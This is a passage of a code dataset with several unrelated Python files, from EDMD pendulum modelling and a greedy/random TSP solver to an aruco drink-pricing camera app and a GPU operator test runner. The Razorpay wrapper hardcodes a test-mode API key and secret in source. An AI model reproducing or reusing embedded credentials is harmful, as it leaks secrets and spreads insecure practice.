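# `pick_uniform` is a hypothetical helper; rng is any random.Random-compatible
# source (Mesa agents expose one as self.random).
def pick_uniform(rng, values):
    return rng.choice(list(values))

# usage sketch:
# best_action = pick_uniform(self.random, (no_value, friends_value, public_value))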
is greater than 8\n self.happy = best_action\n\n # Function for agents to evaluate their preferences in a given location, returns an array of with attributes of\n # each actions\n def processLocation(self, location):\n attributes = AgentConstants.places.loc[:, location]\n\n # Calculate the new values with places_attribute * agent_attribute, then return all of it as an array\n preferences = pd.Series(data=[self.pleasure, self.recognition, self.privacy, self.security],\n index=AgentConstants.places.index)\n new_preferences = pd.Series(data=(preferences.values * attributes.values), index=AgentConstants.places.index)\n\n # Compute the values of each action, action_values * new_preference.values\n # Format:\n # SHARE_NO SHARE_FRIENDS SHARE_PUBLIC\n # pleasure x x x\n # recognition x x x\n # privacy x x x\n # security x x x\n no_values = AgentConstants.actions.loc[:, 'SHARE_NO']\n friend_values = AgentConstants.actions.loc[:, 'SHARE_FRIENDS']\n public_values = AgentConstants.actions.loc[:, 'SHARE_PUBLIC']\n actions_values = pd.DataFrame(data={'SHARE_NO': (no_values * new_preferences.values),\n 'SHARE_FRIENDS': (friend_values * new_preferences.values),\n 'SHARE_PUBLIC': (public_values * new_preferences.values)},\n index=AgentConstants.actions.index, columns=AgentConstants.actions.columns)\n return actions_values\n\n # Function for getting the agent's current companions, and updating that list for later use\n def updateCompanions(self):\n self.currentCompanions.clear()\n\n # Get all agents that are friends and in the same location with the user\n current_companions = [agent for agent in self.model.schedule.agents\n if agent.unique_id in self.friends and agent.pos == self.pos]\n\n for k in current_companions:\n self.currentCompanions.append(k.unique_id)\n\n return current_companions\n\n # Function for checking if anyone in the agent's social circle is in the same location, alter the values for actions\n # based on companion's preferences if necessary\n def processCompanions(self, best_action, current_companions):\n\n reward = 0\n\n # Look through other companion's preferences, then tweak values for actions accordingly\n for i in current_companions:\n if i.currentAction == self.currentAction:\n reward += 5\n elif i.currentAction != self.currentAction:\n reward -= 2\n\n if reward != 0:\n reward = (reward * 2) / len(current_companions)\n\n best_action += reward\n\n return best_action, reward","sub_path":"PrivacyModel/agents/RandomAgent.py","file_name":"RandomAgent.py","file_ext":"py","file_size_in_byte":7474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"639378368","text":"from sample import *\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Berechne EDMD mit unseren Basisfunktionen und vergleiche Approximation\n\n\ntrajectory = get_sampled_trajectory(\"weakly_pendulum\")\nX = trajectory[:-1]\nY = trajectory[1:]\nP = len(trajectory)\ndim = 12\n\ndef basis(x):\n basis = [np.sin(x), np.sin(x) * np.cos(x), np.sin(x) * np.power(np.cos(x), 2), np.power(np.sin(x), 3),\n np.power(np.sin(x), 3) * np.cos(x), np.power(np.cos(x), 3) * np.sin(x),\n np.power(np.sin(x), 3) * np.power(np.cos(x), 2), np.power(np.sin(x), 3) * np.power(np.cos(x), 3),\n np.power(np.sin(x), 6), np.power(np.sin(x), 6) * np.cos(x),\n np.power(np.sin(x), 6) * np.power(np.cos(x), 2), np.power(np.sin(x), 6) * np.power(np.cos(x), 3)]\n return basis\n\ndef basis2(x):\n basis = []\n for k in range(dim):\n basis += [np.sin(x) * np.power(np.cos(x), k)]\n return basis\n\ndef 
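# Context for the two helpers below (added comments): with a dictionary Psi of
# `dim` basis functions and P snapshot pairs (x_p, y_p), EDMD forms
#     A = (1/P) * sum_p Psi(x_p) Psi(y_p)^T
#     G = (1/P) * sum_p Psi(x_p) Psi(x_p)^T
# and approximates the Koopman operator by K = G^{-1} A. When G is
# ill-conditioned (see the condition number printed in koopman_operator),
# np.linalg.pinv(G) is a hedged, numerically safer alternative to the
# explicit inverse used here.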
A_matrix(gX, gY):\n A = np.zeros((dim, dim))\n for p in range(gX.shape[0]):\n A += np.matmul(gX[p].reshape(-1,1), gY[p].reshape(1,-1))\n return A\n\ndef G_matrix(gX):\n G = np.zeros((dim, dim))\n for p in range(gX.shape[0]):\n G += np.matmul(gX[p].reshape(-1,1), gX[p].reshape(1,-1))\n return G\n\ndef koopman_operator():\n gX, gY= [], []\n for x in X:\n gX += [basis(x)]\n for y in Y:\n gY += [basis(y)]\n\n gX, gY = np.array(gX), np.array(gY)\n \n A = 1/P * A_matrix(gX, gY)\n G = 1/P * G_matrix(gX)\n \n G = np.linalg.inv(G)\n print(np.linalg.cond(G))\n K = np.matmul(G, A)\n\n return K\n\n\nK = koopman_operator()\n\n# print(\"Shape of the Koopman operator: \", K.shape)\n# print(K)\n#\n# basis_vector = 0\n# x0 = np.pi - 1e-2\n# steps = 500\n# pred = 0\n# ph = 5\n# mpc = []\n#\n# koopman_preds = []\n# for s in range(0, steps, ph):\n# abasis = basis(trajectory[s])\n# for m in range(ph):\n# for k in range(dim):\n# pred += np.linalg.matrix_power(K, m)[:, basis_vector][k] * abasis[k]\n# mpc += [pred]\n# pred = 0\n\nbasis_vector = 0\nx0 = np.pi - 1e-2\nsteps = 105\npred = 0\n\nkoopman_preds = []\nbasis = basis(x0)\nfor s in range(steps):\n for k in range(dim):\n pred += np.linalg.matrix_power(K, s)[:, basis_vector][k] * basis[k]\n koopman_preds += [pred]\n pred = 0\n\nprint(koopman_preds[:5])\n#t = np.linspace(0, 20, num=500)\n#t2= t[:105]\nfig, ax = plt.subplots()\nax.plot(np.sin(trajectory), label='sin(x(t))')\nax.plot(koopman_preds, label='[K^t]sin(x_0)')\nax.set(xlabel='time-steps', ylabel='sin(θ)', title='Approximating the simple pendulum with EDMD with a ' + str(K.shape[0]) +'-dim basis')\nax.grid()\nplt.legend()\nplt.ylim(-0.05, 1.05)\nfig.savefig(str(K.shape[0]) + \"dimEDMD.pdf\")\nplt.show()\n\n# plt.plot(t, koopman_preds, label='koopman prediction')\n# plt.plot(t, np.sin(trajectory), label='lifted trajectory')\n# plt.legend()\n# plt.ylim(-0.1, 1.1)\n# plt.show()","sub_path":"edmd.py","file_name":"edmd.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"121553195","text":"import razorpay\n\nclient = razorpay.Client(auth=(\"rzp_test_P67ytGK6zecgQ9\",\"AhBlgfthDyjHMEbfLHWUmFh2\"))\nclient.set_app_details({\"title\":\"Django\"})\n\n\ndef create_order(amount,receipt,currency='INR',payment_capture=1,notes={}):\n razorpay_order_id = client.order.create(data={\n \"amount\":int(amount*100),\n \"currency\":currency,\n \"receipt\":receipt,\n \"payment_capture\":payment_capture,\n \"notes\":notes\n })\n return razorpay_order_id\n\n\ndef fetch_order(order_id):\n return client.order.fetch(order_id)\n\n\ndef refund(order_id,amount):\n client.payment.refund(order_id,f\"{int(amount*100)}\")\n ","sub_path":"locie/gadgets/razorpay.py","file_name":"razorpay.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"572023669","text":"from string_util import reverse, count_whitespace_chars\n\n\nclass Eraser:\n def __init__(self, durability=100):\n self.durability = durability\n\n def erase(self, toErase, text):\n self._erase_preconditions(toErase, text)\n reversedText = reverse(text)\n reversedToErase = reverse(toErase)[:self.durability + count_whitespace_chars(toErase)]\n replaceWith = ' ' * len(reversedToErase)\n self.durability -= len(replaceWith)\n\n editedText = reverse(reversedText.replace(reversedToErase, replaceWith, 1))\n self._erase_postconditions(text, editedText)\n return editedText\n\n def 
_erase_preconditions(self, toErase, text):\n if type(toErase) is not str:\n raise ValueError('expected toErase to be of type \"str\"')\n if type(text) is not str:\n raise ValueError('expected text to be of type \"str\"')\n\n def _erase_postconditions(self, text, editedText):\n if len(editedText) > len(text):\n raise ValueError('erased text became longer than original text')\n","sub_path":"eraser.py","file_name":"eraser.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"306195895","text":"import math\nimport sys\nimport random\n\n\nclass CitiesPath:\n\tdef __init__(self, number_of_cities, cities):\n\t\tself.number_of_cities = number_of_cities # Numbers of cities in the data file\n\t\tself.original_cities = cities # List with the original cities\n\t\tself.cities = self.original_cities[:] # List used to manipulate the cities available\n\t\tself.best_path = list() # Holds the best path\n\t\tself.best_path_distance = math.inf # Total distance of best path\n\t\tself.current_path = list() # Holds the current path\n\t\tself.it = 0 # Number of iterations\n\t\t\n\t\tself.MIN_DISTANCE = math.inf\n\t\tself.MAX_DISTANCE = 0\n\t\n\tdef reset(self):\n\t\tself.cities = self.original_cities[:]\n\t\tself.current_path = list()\n\n\tdef print_path(self, path):\n\t\tresult = \"\"\n\t\tfor city in path:\n\t\t\tresult += f'=> |{city[2]}| '\n\t\treturn result\n\t\n\tdef print_status(self):\n\t\tself.best_path_distance = self.total_distance(self.best_path)\n\t\tprint(f'{self.it} - {self.best_path_distance}\\r')\n\t\n\tdef distance_between_cities(self, a, b):\n\t\treturn math.sqrt(math.pow(b[0] - a[0], 2) + math.pow(b[1] - a[1], 2))\n\t\n\tdef closest_city(self, a):\n\t\tmin_dist = math.inf\n\t\tmin_dist_city = tuple()\n\t\tfor c in self.cities:\n\t\t\tdist = self.distance_between_cities(a, c)\n\t\t\tif c[2] != a[2] and dist < min_dist:\n\t\t\t\tmin_dist = dist\n\t\t\t\tmin_dist_city = c\n\t\t\n\t\treturn min_dist_city, min_dist\n\t\n\tdef total_distance(self, path):\n\t\tdistance_sum = 0\n\t\tfor index in range(0, len(path) - 1):\n\t\t\tdist = self.distance_between_cities(path[index], path[index + 1])\n\t\t\tdistance_sum += dist\n\t\t\n\t\treturn distance_sum\n\t\n\tdef find_greedy_path(self):\n\t\t\n\t\tself.current_path.append(self.cities.pop(random.randint(0, len(self.cities) - 1)))\n\t\t\n\t\twhile len(self.cities) > 0:\n\t\t\tnext_city, next_city_distance = self.closest_city(self.current_path[len(self.current_path) - 1])\n\t\t\t\n\t\t\tif next_city_distance > self.MAX_DISTANCE:\n\t\t\t\tself.MAX_DISTANCE = next_city_distance\n\t\t\tif next_city_distance < self.MIN_DISTANCE:\n\t\t\t\tself.MIN_DISTANCE = next_city_distance\n\t\t\t\t\n\t\t\tself.cities.remove(next_city)\n\t\t\tself.current_path.append(next_city)\n\t\t\n\t\tself.it += 1\n\t\treturn self.current_path\n\n\tdef find_genetic_path(self):\n\t\twhile 1:\n\t\t\t\n\t\t\tif len(self.current_path) == 0:\n\t\t\t\tnext_city = self.cities.pop(random.randint(0, len(self.cities) - 1))\n\t\t\t\tself.current_path.append(next_city)\n\t\t\t\n\t\t\tif len(self.cities) == 0:\n\t\t\t\tself.it += 1\n\t\t\t\tcurrent_path_distance = self.total_distance(self.current_path[:])\n\t\t\t\tif current_path_distance < self.best_path_distance:\n\t\t\t\t\tself.best_path_distance = float(current_path_distance)\n\t\t\t\t\tself.best_path = self.current_path[:]\n\t\t\t\t\tself.print_status()\n\t\t\t\tself.reset()\n\t\t\t\n\t\t\telse:\n\t\t\t\tcurrent_path_distance = 
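# `distance_between_cities` above hand-rolls the Euclidean distance; a hedged
# stdlib alternative (the name `euclidean` is an addition, not part of this
# script) avoids overflow in the intermediate squares:
def euclidean(a, b):
    # math.hypot(dx, dy) == sqrt(dx*dx + dy*dy), computed more robustly
    return math.hypot(b[0] - a[0], b[1] - a[1])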
self.total_distance(self.current_path[:])\n\t\t\t\tif current_path_distance > self.best_path_distance:\n\t\t\t\t\tself.reset()\n\t\t\t\telse:\n\t\t\t\t\tnext_city = self.cities.pop(random.randint(0, len(self.cities) - 1))\n\t\t\t\t\tdist = self.distance_between_cities(next_city, self.current_path[len(self.current_path)-1])\n\t\t\t\t\tif dist > self.MAX_DISTANCE:\n\t\t\t\t\t\tself.cities.append(next_city)\n\t\t\t\t\t\tnext_city, _ = self.closest_city(self.current_path[len(self.current_path) - 1])\n\t\t\t\t\t\tself.cities.remove(next_city)\n\t\t\t\t\t\tself.current_path.append(next_city)\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.current_path.append(next_city)\n\t\t\t\t\n\t\t\n\tdef find(self):\n\t\tself.best_path = self.find_greedy_path()\n\t\tself.best_path_distance = self.total_distance(self.best_path)\n\t\t\n\t\tbest_path_distance_formated = \"%.2f\" % self.best_path_distance\n\t\tprint(f'({best_path_distance_formated} u.d) Found best path with greedy algorithm')\n\t\tprint(f'Max distance between cities in current path: {self.MAX_DISTANCE}')\n\t\tprint(f'Min distance between cities in current path: {self.MIN_DISTANCE}')\n\t\t\n\t\tprint(f'Working with genetic algorithm...\\n')\n\t\t\n\t\tself.reset()\n\t\t\n\t\tself.print_status()\n\t\t\n\t\tself.find_genetic_path()\n\n\ncities = list()\nnumbers_of_cities = 0\n\nif len(sys.argv) == 1:\n\tprint(f'Reading from stdin')\n\tnumber_of_cities = int(sys.stdin.readline())\n\tfor i in range(number_of_cities):\n\t\tline = sys.stdin.readline().split()\n\t\tcity = (float(line[0]), float(line[1]), str(line[2]))\n\t\tcities.append(city)\nelse:\n\tfile_path = sys.argv[1]\n\tprint(f'Reading from file {file_path}')\n\tfile = open(file_path)\n\tnumber_of_cities = int(file.readline())\n\tfor line in file:\n\t\tline = line.split()\n\t\tcity = (float(line[0]), float(line[1]), str(line[2]))\n\t\tcities.append(city)\n\tfile.close()\n\ncp = CitiesPath(number_of_cities, cities)\n\ncp.find()\n","sub_path":"cities_path.py","file_name":"cities_path.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"589213617","text":"'''\nThis script identifies drinks marked with aruco markers and calculates their total cost\n\nUser variables are to be set in the 'config' file, not within the program\n\nAuthor: Fasermaler \nMarch 2019\n'''\n\nimport cv2\nimport numpy as np\n\nimport cv2.aruco as aruco\n\nimport csv\n\n# Fire base imports\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\n# Time import\nimport time\n\n# import thread to do multithreading\nimport _thread\n\n# import argparse to take in system arguments\nimport argparse\n\n# Custom imports\nfrom aruco_detector import aruco_detector\nfrom picam_class import pi_cam\nfrom video_reader import video_reader\nfrom arg_parser import arg_parser\nfrom price_calculator import price_calculator\nfrom csv_reader import csv_reader\nfrom pull_prices import pull_prices\n\n\nclass cutQ_vision_class:\n\n\tdef __init__(self, drinkp):\n\t\t# Parses the console arguments\n\t\tself.args = arg_parser()#default_imshow=False)\n\t\tself.args.parse_arguments()\n\n\t\t# start the csv reader \n\t\tself.csv_read = csv_reader()\n\n\t\t# Get the config file parameters\n\t\tself.config_read = csv_reader()\n\t\tprint(self.config_read.get_config())\n\n\t\t# If no video path was specified, use the pi camera as live feed\n\t\tif self.args.video_path == None:\n\n\t\t\tself.stream = pi_cam(self.config_read.pi_height, 
self.config_read.pi_width, self.config_read.pi_fps)\n\n\t\telse:\n\t\t\tself.stream = video_reader(str(self.args.video_path))\n\n\t\t# Start the aruco detector\n\t\tself.aruco_detector = aruco_detector()\n\n\t\t# Start the price calculator\n\t\tprint(drinkp)\n\t\tself.prices = price_calculator(drinkp)\n\n\n\t\tself.drinks = None\n\t\tself.price = None\n\t\tself.drink_dict = {}\n\t\t\n\n\t\t\t\t# Starts the thread to get frames\n\t\t_thread.start_new_thread(self.stream.get_frame_continuous, ())\n\n\tdef start(self):\n\n\t\treset_count = 0\n\t\t\n\t\t# encapsulate the whole program in a try except in case of termination\n\t\t# try:\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\t# get the frame from the stream\n\t\t\t\tframe = self.stream.frame\n\t\t\t\t#self.drink_dict = {}\n\n\n\n\n\t\t\t\t# get the coordinates and ids of the aruco markers\n\t\t\t\t#try:\n\n\t\t\t\tcorners, ids = self.aruco_detector.return_aruco_ids(frame)\n\t\t\t\t\n\t\t\t\tif ids is not None:\n\t\t\t\t\tself.drink_dict = {}\n\n\t\t\t\t\t# calculate the prices\n\t\t\t\t\t\n\t\t\t\t\tself.prices.calculate_price(ids)\n\t\t\t\t\t\n\n\n\t\t\t\t\t# If the user opts to show the cv2 screen\n\n\t\t\t\t\tif self.args.imshow:\n\t\t\t\t\t\tprint(self.prices.drinks_list)\n\t\t\t\t\t\tself.aruco_detector.draw_markers(frame, corners, ids, text=self.prices.drinks_list, text_flag=True)\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\n\t\t\t\t\tprint(self.prices.total_price)\n\t\t\t\t\tfor i in range(len(self.drinks)):\n\t\t\t\t\t\tif self.drinks[i] not in self.drink_dict.keys():\n\t\t\t\t\t\t\tif self.drinks[i] is not None:\n\t\t\t\t\t\t\t\tself.drink_dict[self.drinks[i]] = (1, self.prices.pure_prices[self.drinks[i]])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.drink_dict[self.drinks[i]] = (self.drink_dict[self.drinks[i]][0] + 1 , self.prices.pure_prices[self.drinks[i]])\n\t\t\t\t\tprint(self.drink_dict)\n\t\t\t\t\t#reset_count = 0\n\t\t\t\telse:\n\t\t\t\t\tif reset_count == 10:\n\t\t\t\t\t\tself.drink_dict = {}\n\t\t\t\t\t\treset_count = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\treset_count += 1\n\t\t\t\tcv2.imshow('Stream', frame)\n\t\t\t\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\t\t\t\tbreak\n\n\t\t\t\t# updates the main class attributes\n\t\t\t\tself.price = self.prices.total_price\n\t\t\t\tself.drinks = self.prices.drinks_list\n\n\n\n\t\t\t\t\t\n\t\t\t\t# except:\n\t\t\t\t# \t#print(\"skipped a frame\")\n\t\t\t\t# \tpass\n\t\t\texcept Exception as e: print(e)\n\n\t\t# except:\n\n\t\t# \t# terminate the stream\n\t\t# \tself.stream.terminate = True\n\n\t\tcv2.destroyAllWindows()\n\n## Test Code ##\n\n#vision = cutQ_vision_class()\n\n# Do note that this has no termination condition at the moment\n#vision.start()\n\n\n\n\n","sub_path":"vision/cutQ_vision_class.py","file_name":"cutQ_vision_class.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"145031914","text":"\"\"\"!@brief TestScript to manage (build/push/run) operators\n\"\"\"\nimport argparse\nimport subprocess\nimport sys\nimport time\nimport glob\nfrom colorama import Fore, Back, Style\n# pylint: disable=W0622 (redefined-builtin)\nfrom parse import compile\n\n\nclass TestUtils:\n    \"\"\"!@brief Utilities for TestScript\n    \"\"\"\n    @staticmethod\n    def alert_message_exit(msg, halt = True):\n        \"\"\"!@brief print alert message and exit\n        @param msg log message\n        \"\"\"\n        print('\\033[31m' + msg + '\\033[0m\\n')\n        if halt:\n            sys.exit(0)\n\n    @staticmethod\n    def log_print(msg):\n        \"\"\"!@brief print log message\n        @param msg log message\n        
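# The `_thread.start_new_thread` call in cutQ_vision_class.__init__ above has
# no handle for joining or stopping the frame grabber. A hedged sketch with
# the higher-level stdlib API (`start_frame_grabber` is a hypothetical name):
def start_frame_grabber(stream):
    import threading
    # daemon=True lets the process exit even if the grabber loop never returns
    t = threading.Thread(target=stream.get_frame_continuous, daemon=True)
    t.start()
    return t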
\"\"\"\n print(\"=\" * 40)\n print(\"===== \" + msg + \" =====\")\n print(\"=\" * 40)\n\n @staticmethod\n def log_print_g(msg):\n \"\"\"!@brief print log message with color\n @param msg log message\n \"\"\"\n print(\"=\" * 80)\n print(Fore.GREEN + Back.BLACK + Style.BRIGHT + msg + Fore.RESET + Back.RESET + Style.RESET_ALL)\n print(\"=\" * 80)\n time.sleep(2)\n\n @staticmethod\n def shell(cmd):\n \"\"\"!@brief perform bash cmd\n \"\"\"\n process = subprocess.run(cmd, executable=\"/bin/bash\", shell=True)\n if process.returncode != 0:\n TestUtils.alert_message_exit(\"Aborted command : {}\".format(cmd), halt = False)\n\n @staticmethod\n def shell_return(cmd):\n \"\"\"!@brief perform bash cmd and return returncode\n \"\"\"\n process = subprocess.Popen(cmd, shell=True)\n process.wait()\n return process.returncode\n\n @staticmethod\n def shell_with_output(cmd):\n \"\"\"!@brief return stdout from bash cmd\n \"\"\"\n result = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n stdoutdata, unused_stderrdata = result.communicate()\n return stdoutdata\n\n\nclass TestManager:\n \"\"\"!@brief Manager of TestScript\n \"\"\"\n\n _COMMAND_LIST = {\n 'build': ['b'],\n 'push': ['p'],\n 'run': ['r'],\n 'lcov': ['c'],\n }\n\n _TARGET_LIST = {\n 'emulator': ['emul'],\n 'universal2100': ['2100'],\n }\n\n _OPERATOR_LIST = list()\n\n _ROOT_DIR = '../../../../../../../../..'\n\n _ANDROID_BP = '''cc_binary {{\n name: \"enn_gpu_op_{0}_test\",\n vendor: true,\n rtti: true,\n defaults: [\n \"enn_defaults\",\n ],\n srcs: [\n \"{0}_test.cpp\",\n ],\n static_libs: [\n \"libgtest\",\n \"libgtest_main\",\n ],\n shared_libs: [\n \"libenn_user_driver_gpu\",\n ],\n}}\\n\n'''\n\n _CMAKELISTS_TXT = '''set(SOURCE_FILES {0}_test.cpp ../operators/{1}/{1}.cpp)\nadd_executable(enn_gpu_op_{0}_test ${{SOURCE_FILES}})\ntarget_link_libraries(enn_gpu_op_{0}_test ${{LIBRARY_FILES}})\nadd_test(NAME {0}_test COMMAND enn_gpu_op_{0}_test)\\n\n'''\n\n _LCOV = 'lcov --capture --directory build/CMakeFiles/enn_gpu_op_{0}.dir/ --output-file coverage/{0}_coverage.info'\n _GEN_HTML = 'genhtml coverage/{0}_coverage.info --output-directory coverage/{0}_coverage'\n\n _LCOV_FILTER = \"'/usr/include/*' '*/userdriver/common/*' '*/userdriver/gpu/op_test/*' \\\n '*/userdriver/gpu/common/*.hpp'\"\n _LCOV_INTEG_RAW = \"lcov --capture --directory build/CMakeFiles/ -o coverage/gpu_op_test_coverage.raw\"\n _LCOV_INTEG = \"lcov -r coverage/gpu_op_test_coverage.raw {} -o coverage/gpu_op_test_coverage.info\".format(_LCOV_FILTER)\n _GEN_HTML_INTEG = \"genhtml coverage/gpu_op_test_coverage.info --output-directory coverage/gpu_op_test_coverage\"\n\n def __init__(self):\n # Collect test list\n temp_op_list = glob.glob('*_test.cpp')\n for top in temp_op_list:\n self._OPERATOR_LIST.append(top.replace('test/', '').replace('_test.cpp', ''))\n self._OPERATOR_LIST.sort()\n\n def parse_args(self):\n \"\"\"!@brief return parsed arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='\\033[31m** CPU userdriver operator UnitTest Script **\\033[0m')\n parser.add_argument('--command', '-c', dest='command', default='run',\n help='select command {}'.format(TestManager._COMMAND_LIST.keys()))\n parser.add_argument('--target', '-t', dest='target', default='universal2100',\n help='select target {}'.format(TestManager._TARGET_LIST.keys()))\n parser.add_argument('operator', nargs='*',\n help='select operator {}'.format(self._OPERATOR_LIST))\n args = parser.parse_args()\n\n # Check invalid command\n if args.command not in 
TestManager._COMMAND_LIST.keys():\n TestUtils.alert_message_exit('Invalid command : {}'.format(args.command))\n\n # Check invalid target\n if args.target not in TestManager._TARGET_LIST.keys():\n TestUtils.alert_message_exit('Invalid target : {}'.format(args.target))\n\n # Check invalid test name\n for operator in args.operator:\n if operator == 'all':\n args.operator = self._OPERATOR_LIST\n break\n if operator not in self._OPERATOR_LIST:\n TestUtils.alert_message_exit('Invalid operator : {}'.format(operator))\n\n return args\n\n def process_build(self, args):\n \"\"\"!@brief perform build CPU operator unittest\n \"\"\"\n if args.target == 'emulator':\n # Generate CMakeLists.txt with test list\n if args.operator:\n print('Build operator :', args.operator)\n with open('CMakeLists.base') as base_file:\n with open('CMakeLists.txt', 'w+') as txt_file:\n txt_file.write(base_file.read())\n for operator in args.operator:\n class_name = self.get_class_name(operator)\n if class_name:\n txt_file.write(TestManager._CMAKELISTS_TXT.format(operator, class_name))\n\n # Emulator build for linux\n TestUtils.shell('mkdir build;\\\n cd build;\\\n cmake .. -DUNIT_TEST=true;\\\n make;\\\n cd -')\n else:\n # Generate Android.bp with test list\n if args.operator:\n print('Build operator :', args.operator)\n with open('Android.bp', 'w+') as bp_file:\n for operator in args.operator:\n bp_file.write(TestManager._ANDROID_BP.format(operator))\n\n # Run build\n print(\"&&&&&&&\\n\")\n TestUtils.shell('source {0}/build/envsetup.sh;\\\n lunch full_{1}_r-eng;\\\n cd ../../..;\\\n mm -j16;\\\n cd -'.format(TestManager._ROOT_DIR, args.target))\n\n # pylint: disable=R0201 (no-self-use)\n def process_push(self, args):\n \"\"\"!@brief perform push CPU operator unittest file and library\n \"\"\"\n if not args.operator:\n TestUtils.alert_message_exit('Please input operator to push in device')\n\n if args.target == 'emulator':\n print('\\033[31mEmulator target do not push any files!!!\\033[0m')\n else:\n cmd = 'cd {0}/out/target/product/{1}/vendor/; adb root; adb remount;\\\n adb push lib /vendor/; adb push lib64 /vendor/;'.format(TestManager._ROOT_DIR, args.target)\n print('Push operator :', args.operator)\n for operator in args.operator:\n cmd += 'adb push bin/enn_gpu_op_{}_test /vendor/bin/;'.format(operator)\n cmd += 'cd -'\n print(\"cmd\", cmd)\n TestUtils.shell(cmd)\n\n # pylint: disable=R0201 (no-self-use)\n def process_run_test(self, args):\n \"\"\"!@brief perform execute CPU operator unittest\n \"\"\"\n if args.target == 'emulator':\n TestUtils.shell('cd build;\\\n ctest --output-on-failure;\\\n cd -')\n else:\n if not args.operator:\n TestUtils.alert_message_exit('Please input operator to run test')\n\n print('Test operator :', args.operator)\n for operator in args.operator:\n print('\\n\\033[33m************ Run enn_gpu_op_{}_test ************\\033[0m'.format(operator))\n TestUtils.shell('adb shell enn_gpu_op_{}_test;'.format(operator))\n\n # pylint: disable=R0201 (no-self-use)\n def get_class_name(self, operator):\n \"\"\"!@brief get operator class name from test file\n \"\"\"\n with open('{0}_test.cpp'.format(operator)) as test_file:\n pattern = compile('#include \"{path}/{class}/{class}.hpp\"\\n')\n for line in test_file.readlines():\n parsed = pattern.parse(line)\n if parsed:\n return parsed['class']\n return None\n\n def process_coverage_test(self, args):\n \"\"\"!@brief perform execute gpu operator unittest\n \"\"\"\n if args.target == 'emulator':\n self.process_run_test(args)\n TestUtils.shell('mkdir -p 
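get_class_name above uses the parse library to pull the operator class name out of an include line; the same extraction can be done with the standard re module (a sketch for environments without parse; the include path in the demo is made up, and the back-reference plays the role of the repeated {class} field):

import re

# Matches lines such as: #include "userdriver/gpu/operators/CLAdd/CLAdd.hpp"
# The \1 back-reference requires the directory name to equal the file stem.
INCLUDE_RE = re.compile(r'#include "(?:.+)/([A-Za-z0-9_]+)/\1\.hpp"')

def class_name_from_line(line):
    match = INCLUDE_RE.search(line)
    return match.group(1) if match else None

print(class_name_from_line('#include "userdriver/gpu/operators/CLAdd/CLAdd.hpp"'))  # CLAdd
print(class_name_from_line('int main() { return 0; }'))                             # None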
coverage')\n            test_dir_list = glob.glob('build/CMakeFiles/enn_gpu_op_*.dir')\n            pattern = compile('build/CMakeFiles/enn_gpu_op_{op_test}.dir')\n            for test_dir in test_dir_list:\n                test_name = pattern.parse(test_dir)['op_test']\n                if test_name:\n                    TestUtils.shell(TestManager._LCOV.format(test_name))\n                    TestUtils.shell(TestManager._GEN_HTML.format(test_name))\n        else:\n            TestUtils.alert_message_exit('Not support yet for device!!!')\n\n    def process_coverage_test_integ(self, args):\n        \"\"\"!@brief perform execute CPU operator unittest (integrated)\n        \"\"\"\n        if args.target == 'emulator':\n            self.process_run_test(args)\n            TestUtils.shell('mkdir -p coverage')\n            TestUtils.shell(TestManager._LCOV_INTEG_RAW)\n            TestUtils.shell(TestManager._LCOV_INTEG)\n            TestUtils.shell(TestManager._GEN_HTML_INTEG)\n        else:\n            TestUtils.alert_message_exit('Not support yet for device!!!')\n\n\ndef main():\n    \"\"\"!@brief Entrypoint\n    \"\"\"\n    test_manager = TestManager()\n    args = test_manager.parse_args()\n    if args.command == 'build':\n        test_manager.process_build(args)\n    elif args.command == 'push':\n        test_manager.process_push(args)\n    elif args.command == 'lcov':\n        test_manager.process_coverage_test_integ(args)\n    else:\n        test_manager.process_run_test(args)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"src/userdriver/gpu/op_test/gpu_op_test.py","file_name":"gpu_op_test.py","file_ext":"py","file_size_in_byte":10670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"111485612","text":"from django.conf.urls import url\nfrom income_statements import views\n\n\nurlpatterns = [\n    url(r'^api/incomes$', views.income_list),\n    url(r'^api/incomes/(?P<symbol>[\\w\\-]+)$', views.symbol_income_list),\n    url(r'^api/incomes/(?P<symbol>[\\w\\-]+)/(?P<year>[0-9]+)$', views.symbol_income_detail),\n    url(r'^api/income_init/annualReport$', views.income_init_annual),\n    url(r'^api/income_init/quarterlyReport$', views.income_init_quarterly),\n]\n","sub_path":"income_statements/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"300457417","text":"miLista=[\"juan\",5,\"Esteban\"]\n\nprint(miLista[2])\n\n\n\n# to access slices of very large lists\nprint(miLista[0:3])  # the last index is not included in the slice range\n\nprint(miLista[2:])  # this form means: from index 2 to the end of the list\n\n\n## to add one more element to the list after it has been declared\nmiLista.append(\"maria\")  ## appends it at the end of the list\n\nmiLista.insert(2,\"luis\")  # inserts it at the specified index\n\nmiLista.extend([\"martha\",\"emelina\",\"henry\"])  ## to add several elements at once; 
